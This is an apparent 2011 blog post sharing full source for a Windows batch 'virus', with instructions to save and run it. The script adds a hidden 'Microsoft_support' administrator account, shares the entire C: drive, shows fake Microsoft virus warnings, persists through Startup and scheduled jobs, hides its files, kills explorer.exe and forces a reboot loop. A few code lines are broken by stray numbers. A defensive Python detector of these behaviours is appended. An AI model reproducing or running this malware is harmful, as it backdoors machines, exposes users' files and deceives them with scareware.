12/24/2011

C_relwarC708 v1.0 Virus Source Code

I came across this while reading the book Bat File Programming and decided to post it. I want to state that it is purely for educational purposes, so please do not use this code where it should not be used. Copy and paste the code lines below into Notepad and save them as a .bat file. Here is a brief explanation of how the code works. First, it creates a folder called 1001 under C:\Windows\System32 and a user account called Microsoft_support, and changes the time to 12:00 and the date to 01-01-2000. Note that the Microsoft_support account has administrative rights. Next it creates a VB Script file called warnusr.vbs, and a message appears with the text "Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus". To someone who does not know better, it looks as if Microsoft sent it. Because the code has already changed the system date and time, at 12:01 and 12:02 you will see the message "You are requested to restart your Computer Now to prevent Damages or Data loss". If an unsuspecting user restarts, the computer will keep restarting in a loop. The way to fix it is to boot the computer into Safe Mode and delete the folder called 1001 under C:\Windows\System32.

@echo off
cd\
cd %SystemRoot%\system32\
md 1001
cd\
cls
rem N0 H4rm 15 cau53d unt1| N0w
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000
echo 12:00:00.00 | time >> nul
echo 01/01/2000 | date >> nul
net users Microsoft_support support /add
rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt
rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.
net localgroup administrators Microsoft_support /add
rem 5h4r3 th3 R00t Dr1v3
net share system=C:\ /UNLIMITED
cd %SystemRoot%\system32\1001
echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your
computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) >
%SystemRoot%\system32\1001\warnusr.vbs
rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )
mode con rate=1 > nul
mode con delay=4 >> nul129
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y
@ 12:01 and 12:02
at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >>
nul
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3
3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5
copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All
Users\Start Menu\Programs\Startup\warnusr.vbs”
rem
***************************************************************************
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and
w1|| r35t4rt c0nt1nu0u5|y
echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your
attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can
detect this virus now. Wanna try? Hahahaha….! ” > %systemroot%\system32\1001\sd.bat
copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat
“%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”
rem
***************************************************************************
cd\
cls
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r
cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\
attrib +h +s +r warnusr.vbs
attrib +h +s +r sd.bat
cd\130
cd %systemroot%\system32
attrib +h +s +r 1001
rem K1||5 th3 3xp|0r3r.3×3 Pr0c355
taskkill /F /IM explorer.exe
rem @ EOV // End of Virus
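A defender-side illustration, added here and not part of the original post or the book: a small Python triage function that flags, in a batch file, the behaviours the listing above combines (a new account promoted to Administrators, a root-drive share, `at` jobs, Startup-folder copies, hidden/system attributes). The rule names, the `triage` and `verdict` functions and the scoring are assumptions of this example, and the sample input is constructed from commands shown in the listing.

```python
import re

# Rules derived from commands in the listing above; names are this example's own.
RULES = [
    ("clock_tamper", r"\|\s*(time|date)\b"),
    ("account_created", r"\bnet\s+users?\s+\S+.*\s/add\b"),
    ("admin_group_add", r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add\b"),
    ("drive_shared", r"\bnet\s+share\s+\S+=[a-z]:\\"),
    ("scheduled_job", r"^\s*at\s+\d{1,2}:\d{2}\b"),
    ("startup_persistence", r"\bcopy\b.*\\startup\\"),
    ("hidden_system_attrib", r"\battrib\b(?=.*\+h)(?=.*\+s)"),
    ("shell_killed", r"\btaskkill\b.*\bexplorer\.exe\b"),
    ("forced_reboot", r"\bshutdown\s+[-/]r\b"),
]

SAMPLE = r"""@echo off
rem constructed sample shortened from the listing; rem lines are ignored
echo 12:00:00.00 | time >> nul
net users Microsoft_support support /add
net localgroup administrators Microsoft_support /add
net share system=C:\ /UNLIMITED
at 12:01 /interactive %SystemRoot%\system32\1001\warnusr.vbs
copy warnusr.vbs "%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\warnusr.vbs"
attrib +h +s +r warnusr.vbs
taskkill /F /IM explorer.exe
"""

def triage(script_text):
    """Return {rule name: [1-based line numbers]} for non-comment lines."""
    hits = {}
    for number, line in enumerate(script_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or re.match(r"(?i)(rem\b|::)", stripped):
            continue  # skip blanks and rem / :: comments
        for name, pattern in RULES:
            if re.search(pattern, stripped, re.IGNORECASE):
                hits.setdefault(name, []).append(number)
    return hits

def verdict(hits):
    """'high' when a new account is made administrator and the script persists."""
    seen = set(hits)
    escalates = {"account_created", "admin_group_add"} <= seen
    persists = bool({"startup_persistence", "scheduled_job"} & seen)
    return "high" if escalates and persists else "review" if hits else "clean"

if __name__ == "__main__":
    found = triage(SAMPLE)
    print(found, verdict(found))
```

The same rule hits also list what to check on an affected host beyond the 1001 folder: the added account, the share, the scheduled jobs and the Startup-folder copies.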
